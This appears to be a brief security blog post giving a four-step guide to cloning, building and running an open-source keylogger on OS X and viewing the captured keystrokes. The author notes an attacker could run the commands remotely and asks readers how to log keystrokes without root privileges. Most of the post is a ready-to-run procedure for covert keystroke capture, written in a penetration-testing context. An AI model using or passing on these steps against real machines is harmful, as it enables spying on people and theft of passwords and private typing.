Keystroke logger on OS X
I recently ran into an issue where the keylogger in Metasploit did not work on OS X. Instead of troubleshooting to figure out why I went ahead and did some research to learn more about OS X keyloggers. It is surprisingly easy to log keystrokes on OS X even though there is not much information out there about this. Here is a quick step by step guide.
Step 1. git clone https://github.com/caseyscarborough/keylogger && cd keylogger
Step 2. make
Step 3. ./keylogger ~/logfile.txt
Step 4. Tail –f ~/logfile.txt
That’s it! You are now logging keystrokes and using the tail command to view them. Keep in mind an attacker could remotely run these commands too.
I noticed that if you run the keylogger as a regular user the only keys that log are control, fn, alt, command, caps lock. Non of the character keys are logged. In order for this to work I had to do sudo. I am looking into this more as it would be nice to be able to log keystrokes on OS X with just user privileges. I think this is possible because this app can get keystrokes without root privileges – http://manytricks.com/keycodes/. If you figure out how to do this email me and I will post an update.